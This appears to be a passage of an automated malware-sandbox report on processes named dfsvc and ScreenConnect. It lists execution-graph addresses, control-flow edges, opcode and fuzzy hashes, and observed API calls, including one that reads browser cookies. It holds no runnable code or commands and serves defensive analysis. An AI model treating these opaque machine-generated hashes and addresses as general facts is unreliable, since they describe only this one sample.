                                                                                                                                                                                                                                                                          execution_graph 24855 7ff848f16118 24857 7ff848f52ed0 24855->24857 24856 7ff848f53074 24857->24856 24858 7ff848f14c90 LoadLibraryExW 24857->24858 24859 7ff848f5306b 24858->24859 24860 7ff848f1bf19 24861 7ff848f1bf2f 24860->24861 24862 7ff848f14c90 LoadLibraryExW 24861->24862 24863 7ff848f1c086 24861->24863 24864 7ff848f1bfe6 24862->24864 24865 7ff848f14c90 LoadLibraryExW 24864->24865 24865->24863 24898 7ff848f19958 24899 7ff848f1996f CreateFileW 24898->24899 24901 7ff848f19a8c 24899->24901 24924 7ff848f1527d 24925 7ff848f1528b 24924->24925 24926 7ff848f152f3 24925->24926 24929 7ff848f12ef8 LoadLibraryExW 24925->24929 24928 7ff848f152e8 24929->24928 24945 7ff848f16da0 24947 7ff848f16da4 24945->24947 24948 7ff848f16f40 24947->24948 24949 7ff848f15990 LoadLibraryExW 24947->24949 24949->24948 24980 7ff848f289e4 24981 7ff848f289ed 24980->24981 24982 7ff848f173d0 LoadLibraryExW 24981->24982 24984 7ff848f28a82 24982->24984 24983 7ff848f28b19 24984->24983 24986 7ff848f130b8 24984->24986 24988 7ff848f28ff0 24986->24988 24987 7ff848f29043 24987->24983 24988->24987 24991 7ff848f12ef8 LoadLibraryExW 24988->24991 24990 7ff848f29038 24990->24983 24991->24990 24902 7ff848f2a165 24904 7ff848f2a16d 24902->24904 24903 7ff848f2a2f4 24904->24903 24906 7ff848f16088 24904->24906 24908 7ff848f1608d 24906->24908 24907 7ff848f4c406 24907->24903 24908->24907 24914 7ff848f173d0 24908->24914 24910 7ff848f4c761 24910->24903 24911 7ff848f4c496 24911->24910 24919 7ff848f12ef8 LoadLibraryExW 24911->24919 24913 7ff848f4c74e 24913->24903 24915 7ff848f173ff 24914->24915 24916 7ff848f173f6 24914->24916 24917 7ff848f13f30 LoadLibraryExW 24915->24917 24916->24911 24918 7ff848f17404 24917->24918 24918->24911 24919->24913 24934 7ff848f1d18d 24935 7ff848f1d199 24934->24935 24936 7ff848f1d3cc 24935->24936 24937 7ff848f1d460 24935->24937 24938 7ff848f14c90 LoadLibraryExW 24936->24938 24939 7ff848f14c90 LoadLibraryExW 24937->24939 24942 7ff848f1d449 24937->24942 24938->24942 24939->24942 24940 7ff848f1d62c 24941 7ff848f1d5db 24944 7ff848f14c90 LoadLibraryExW 24941->24944 24942->24940 24942->24941 24943 7ff848f14c90 LoadLibraryExW 24942->24943 24943->24941 24944->24940 24812 7ff848f20b0f 24813 7ff848f20b17 24812->24813 24816 7ff848f157b0 24813->24816 24815 7ff848f20c87 24818 7ff848f157f8 24816->24818 24817 7ff848f1583a 24817->24815 24818->24817 24821 7ff848f12f00 24818->24821 24820 7ff848f15929 24820->24815 24822 7ff848f15990 24821->24822 24824 7ff848f159b4 24822->24824 24825 7ff848f13f30 24822->24825 24824->24820 24828 7ff848f115c8 24825->24828 24827 7ff848f13f55 24827->24824 24830 7ff848f115d1 24828->24830 24829 7ff848f11683 24829->24827 24830->24829 24831 7ff848f11802 LoadLibraryExW 24830->24831 24832 7ff848f11836 24831->24832 24832->24827 24833 7ff848f1c610 24834 7ff848f1c61c 24833->24834 24839 7ff848f14c90 24834->24839 24836 7ff848f1c663 24844 7ff848f1a4c0 24836->24844 24840 7ff848f14cb8 24839->24840 24841 7ff848f14cc3 24839->24841 24840->24836 24842 7ff848f13f30 LoadLibraryExW 24841->24842 24843 7ff848f14cc8 24842->24843 24843->24836 24845 7ff848f1d350 24844->24845 24846 7ff848f1d3cc 24845->24846 24847 7ff848f1d460 24845->24847 24848 7ff848f14c90 LoadLibraryExW 24846->24848 24849 7ff848f14c90 LoadLibraryExW 24847->24849 24852 7ff848f1d449 24847->24852 24848->24852 24849->24852 24850 7ff848f1c674 24851 7ff848f1d5db 24854 7ff848f14c90 LoadLibraryExW 24851->24854 24852->24850 24852->24851 24853 7ff848f14c90 LoadLibraryExW 24852->24853 24853->24851 24854->24850 24964 7ff848f1e8d2 24966 7ff848f1e8ff 24964->24966 24965 7ff848f1ea6b InternetGetCookieW 24967 7ff848f1eac9 24965->24967 24966->24965 24966->24966 24920 7ff848f14b75 24921 7ff848f14b7f 24920->24921 24922 7ff848f13f30 LoadLibraryExW 24921->24922 24923 7ff848f14bad 24922->24923 24870 7ff848f13d36 24871 7ff848f13d3d 24870->24871 24874 7ff848f12e48 24871->24874 24873 7ff848f13e2a 24875 7ff848f13e70 24874->24875 24878 7ff848f12e08 24875->24878 24877 7ff848f13e8a 24877->24873 24879 7ff848f13f30 24878->24879 24880 7ff848f115c8 LoadLibraryExW 24879->24880 24881 7ff848f13f55 24880->24881 24881->24877 24882 7ff848f1a537 24883 7ff848f1a543 24882->24883 24884 7ff848f1a51c 24882->24884 24883->24884 24886 7ff848f47290 24883->24886 24887 7ff848f472b5 24886->24887 24889 7ff848f47343 24887->24889 24892 7ff848f473e5 24887->24892 24897 7ff848f12ef8 LoadLibraryExW 24887->24897 24888 7ff848f473cd 24888->24883 24889->24888 24893 7ff848f1a518 24889->24893 24894 7ff848f47510 24893->24894 24895 7ff848f14c90 LoadLibraryExW 24894->24895 24896 7ff848f4758c 24894->24896 24895->24896 24896->24889 24897->24889 24950 7ff848f134b6 24955 7ff848f12f68 24950->24955 24953 7ff848f1378e 24954 7ff848f134cb 24960 7ff848f13c81 24954->24960 24957 7ff848f12f6d 24955->24957 24956 7ff848f12f84 24956->24954 24957->24956 24958 7ff848f12f00 LoadLibraryExW 24957->24958 24959 7ff848f15929 24958->24959 24959->24954 24962 7ff848f13cae 24960->24962 24961 7ff848f12e48 LoadLibraryExW 24963 7ff848f13d19 24961->24963 24962->24961 24963->24953 24968 7ff848f136d7 24969 7ff848f136e3 24968->24969 24972 7ff848f12f80 24969->24972 24971 7ff848f1370a 24973 7ff848f158a0 24972->24973 24974 7ff848f12f00 LoadLibraryExW 24973->24974 24975 7ff848f15929 24974->24975 24975->24971

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00007FF848F11538 Relevance: 1.9, APIs: 1, Instructions: 370libraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795577677.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848f10000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9d314068b444b85612277286ca059212b4c0afb066d82f106bde05354662d74f
                                                                                                                                                                                                                                                                          • Instruction ID: 88fdb0cec16dbe1c8b6f1e4d203977e14a13397d6aa6ecdc0aa2daa4d55c2e08
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d314068b444b85612277286ca059212b4c0afb066d82f106bde05354662d74f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06B12531E0DACA5FE346E778585A2B97BE1EF96350F0840BEC049C72D7EB289C468345
                                                                                                                                                                                                                                                                          Function 00007FF848F1E8D2 Relevance: 1.8, APIs: 1, Instructions: 278networkCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1024 7ff848f1e8d2-7ff848f1e998 1028 7ff848f1e99a-7ff848f1e9a2 1024->1028 1029 7ff848f1e9a5-7ff848f1e9aa 1024->1029 1028->1029 1030 7ff848f1e9ac-7ff848f1e9b4 1029->1030 1031 7ff848f1e9b7-7ff848f1e9c3 1029->1031 1030->1031 1032 7ff848f1ea49-7ff848f1ea50 1031->1032 1033 7ff848f1e9c9-7ff848f1e9fc 1031->1033 1034 7ff848f1ea6b-7ff848f1eac7 InternetGetCookieW 1032->1034 1040 7ff848f1e9fe-7ff848f1ea00 1033->1040 1041 7ff848f1ea52-7ff848f1ea58 1033->1041 1035 7ff848f1eac9 1034->1035 1036 7ff848f1eacf-7ff848f1eae2 1034->1036 1035->1036 1038 7ff848f1eae4-7ff848f1eb06 1036->1038 1039 7ff848f1eb07-7ff848f1eb39 call 7ff848f1eb55 1036->1039 1038->1039 1052 7ff848f1eb3b 1039->1052 1053 7ff848f1eb40-7ff848f1eb54 1039->1053 1042 7ff848f1ea39-7ff848f1ea47 1040->1042 1043 7ff848f1ea02-7ff848f1ea14 1040->1043 1049 7ff848f1ea5a-7ff848f1ea66 1041->1049 1042->1049 1047 7ff848f1ea18-7ff848f1ea2b 1043->1047 1048 7ff848f1ea16 1043->1048 1047->1047 1051 7ff848f1ea2d-7ff848f1ea35 1047->1051 1048->1047 1049->1034 1051->1042 1052->1053
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795577677.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848f10000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookieInternet
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 930238652-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5ff62b239f1ce55818ec0cc7462bee774a74ef0d3ed31e8c4b9da635c1aa9317
                                                                                                                                                                                                                                                                          • Instruction ID: 83f167cd802f6ca36a8f4079c773dfb969f68a1a642607af7f7d2a55e5dcacc2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff62b239f1ce55818ec0cc7462bee774a74ef0d3ed31e8c4b9da635c1aa9317
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB91AD30908A8D8FDBA9EF28C8557E97BE1FF59311F04426BD84DC7292CF74A9458B81
                                                                                                                                                                                                                                                                          Function 00007FF848F19958 Relevance: 1.7, APIs: 1, Instructions: 173fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1230 7ff848f19958-7ff848f199e0 1234 7ff848f199ea-7ff848f19a8a CreateFileW 1230->1234 1235 7ff848f199e2-7ff848f199e7 1230->1235 1237 7ff848f19a8c 1234->1237 1238 7ff848f19a92-7ff848f19ac5 1234->1238 1235->1234 1237->1238
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795577677.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848f10000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                                          • Opcode ID: e25bf2684692feb8badfdbb0a95636052c64ee3867ec3f2d6a3625109846fe42
                                                                                                                                                                                                                                                                          • Instruction ID: 4b14f0483220794e40351281c724faf03a50c945cbd91673fc3801525a2ca671
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e25bf2684692feb8badfdbb0a95636052c64ee3867ec3f2d6a3625109846fe42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11419F71A0CA5C8FDB58EF5C9845BE9BBE0FB59310F14416EE04DD3252CB34A885CB85
                                                                                                                                                                                                                                                                          Function 00007FF848DFEEBF Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2795220363.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848dfd000_dfsvc.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80405e066df1c78e1bd93e4c3faba64172387ab3484280aa27cf110d558bcb52
                                                                                                                                                                                                                                                                          • Instruction ID: b809ed640d5885c289e3980ff01f02a56764d84f77b1525fe4df63ef1d7efbb6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80405e066df1c78e1bd93e4c3faba64172387ab3484280aa27cf110d558bcb52
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC41C77180EBC44FD756DB2998459523FF0EF56360B1502DFD088CF1A7DB25A84AC7A2

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:13.3%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:12
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                          execution_graph 9988 7ff848f184b8 9989 7ff848f184bf SetProcessMitigationPolicy 9988->9989 9991 7ff848f18552 9989->9991 9992 7ff848f13dfa 9993 7ff848f2f470 CloseHandle 9992->9993 9995 7ff848f2f4eb 9993->9995 9996 7ff848f1f67b 9997 7ff848f1f687 CreateFileW 9996->9997 9999 7ff848f1f7bc 9997->9999 10000 7ff848f14890 10001 7ff848f14899 GetTokenInformation 10000->10001 10003 7ff848f2f2d7 10001->10003

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00007FF848F14890 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 192 7ff848f14890-7ff848f148d9 198 7ff848f148dc 192->198 198->198 199 7ff848f148de-7ff848f14949 198->199 207 7ff848f1494c 199->207 207->207 208 7ff848f1494e-7ff848f2f2d5 GetTokenInformation 207->208 214 7ff848f2f2dd-7ff848f2f30e 208->214 215 7ff848f2f2d7 208->215 215->214
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4c51ee33f93a0b01a7daff654a131f5a4bc33e9ac4f5764c938d3e374fa8b7d9
                                                                                                                                                                                                                                                                          • Instruction ID: e3e5f152285b89b5af89b9a17b163044d91cc69b04b454a0411e5b387d0a8b8e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c51ee33f93a0b01a7daff654a131f5a4bc33e9ac4f5764c938d3e374fa8b7d9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A61F632E0DAC54FE3199F6C68052B97BE1FBA5764F1801BFD089831DBCA689D068785
                                                                                                                                                                                                                                                                          Function 00007FF848F1F67B Relevance: 1.7, APIs: 1, Instructions: 178fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 217 7ff848f1f67b-7ff848f1f710 222 7ff848f1f71a-7ff848f1f7ba CreateFileW 217->222 223 7ff848f1f712-7ff848f1f717 217->223 225 7ff848f1f7bc 222->225 226 7ff848f1f7c2-7ff848f1f7f5 222->226 223->222 225->226
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1102a50d47c11bf0c962d8d566a27772d3b8f59f4c2caa0c3e3a64f4203bc2b6
                                                                                                                                                                                                                                                                          • Instruction ID: 8bca98682af960af2e8d979476df81b5443dde2f06e2a9e90c00bbeb69563378
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1102a50d47c11bf0c962d8d566a27772d3b8f59f4c2caa0c3e3a64f4203bc2b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1351D17191CA5C9FDB58EF58D845BE9BBE0FB59310F1442AEE04DD3252CB34A886CB81
                                                                                                                                                                                                                                                                          Function 00007FF848F184B8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 228 7ff848f184b8-7ff848f18550 SetProcessMitigationPolicy 231 7ff848f18558-7ff848f18587 228->231 232 7ff848f18552 228->232 232->231
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6f75ac45d0178c5e22b4a083ab7571a0d5e66fe1f81a66e88a45110255276d77
                                                                                                                                                                                                                                                                          • Instruction ID: 944b5659a40250e1067a05e786b1a65c14d18cf63194c106a4090d563e240928
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f75ac45d0178c5e22b4a083ab7571a0d5e66fe1f81a66e88a45110255276d77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D31C53191CB188FDB28AF9D984A5F9BBE0EB55711F00413EE049D3651DB74A8458B85
                                                                                                                                                                                                                                                                          Function 00007FF848F13EAA Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 234 7ff848f13eaa-7ff848f184ef 236 7ff848f184f6-7ff848f18550 SetProcessMitigationPolicy 234->236 237 7ff848f18558-7ff848f18587 236->237 238 7ff848f18552 236->238 238->237
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                          • Opcode ID: ebde48901d4fb0e0a6727888cd4f3a000d99a85527c9d4e5f2ce509f71c4eee5
                                                                                                                                                                                                                                                                          • Instruction ID: 9a9253d42721e652bd0f929168900d0f8239f8df9c2900a61f51df5e7160d790
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebde48901d4fb0e0a6727888cd4f3a000d99a85527c9d4e5f2ce509f71c4eee5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5521F53091CB188FDB18AF9CD84A6FABBE0EB59711F00413EE04AD3251DB74B8458B91
                                                                                                                                                                                                                                                                          Function 00007FF848F13DFA Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 338 7ff848f13dfa-7ff848f2f4e9 CloseHandle 341 7ff848f2f4eb 338->341 342 7ff848f2f4f1-7ff848f2f51f 338->342 341->342
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2289920314.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                          • Opcode ID: 66e54f7e0349cfdc6269bc5c304f0cda7a23f51d4a0ddac67d054a2393b9f556
                                                                                                                                                                                                                                                                          • Instruction ID: 634da9f715cfbe5f4e5c685bd39c4a1d70c2a0bbeb4bbc51f03d8c72bf4dfef8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66e54f7e0349cfdc6269bc5c304f0cda7a23f51d4a0ddac67d054a2393b9f556
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D421F13090CA0C9FDB58DF98C409BF9BBE0EBA5321F00422ED04AD3651CB75A856CB90

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 02481828 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq$$jq
                                                                                                                                                                                                                                                                          • API String ID: 0-3720491408
                                                                                                                                                                                                                                                                          • Opcode ID: 288b97c0662742ab8d10098e78d6947f87d363040993ef59832107de7637362d
                                                                                                                                                                                                                                                                          • Instruction ID: a94930bccb3be2c578cc6d3c4a1fa9738197cc65a68132ea54a293d009c9943f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 288b97c0662742ab8d10098e78d6947f87d363040993ef59832107de7637362d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92018F346593848FC71AABB4991895A3FB5EF4621531940EBE849CB273CB35DC83CB51
                                                                                                                                                                                                                                                                          Function 024820B5 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 0-76226702
                                                                                                                                                                                                                                                                          • Opcode ID: 1a05db053f34c8a9c8f3410f86b4da094ef83e7f1fe0b04566c83aa527e2a2b9
                                                                                                                                                                                                                                                                          • Instruction ID: b742776d473c8b8ed1c789e92ad04b2643f11ea91cbc4f92cf653d361870b73c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a05db053f34c8a9c8f3410f86b4da094ef83e7f1fe0b04566c83aa527e2a2b9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E51AC347102418FD715EB38D964AAE7BE6EF88604B14846AD806DB375EFB4DC06CBA0
                                                                                                                                                                                                                                                                          Function 0248522A Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          • Opcode ID: 4b3755dc9e8b518673fc4d0f1480bb46af5fc96aab051f00711a3a1bce6e6ce4
                                                                                                                                                                                                                                                                          • Instruction ID: 17a6f99f607f1f5f32a22803f1bb64033da7b65d3cc75b49f625a14a49b02ca2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b3755dc9e8b518673fc4d0f1480bb46af5fc96aab051f00711a3a1bce6e6ce4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22713934B106058FCB14DFA8E894A9EBBF6FF89315B5181A9E5069B365DB70EC02CF40
                                                                                                                                                                                                                                                                          Function 02486F40 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LRjq
                                                                                                                                                                                                                                                                          • API String ID: 0-665714880
                                                                                                                                                                                                                                                                          • Opcode ID: cadf2d6ea5e13e3e13a604ac73a48cd2de2ccf722d8a0a1dd254c34671e2526d
                                                                                                                                                                                                                                                                          • Instruction ID: 2eb04468f6c969e65cdbc16814609b718f102c0f5cc83423064df1ac0833ad73
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cadf2d6ea5e13e3e13a604ac73a48cd2de2ccf722d8a0a1dd254c34671e2526d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0511334F202108FDB25AB64D964B6FBBF2BF85305F24856AE4069B3A5DB309C45CB81
                                                                                                                                                                                                                                                                          Function 024842F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
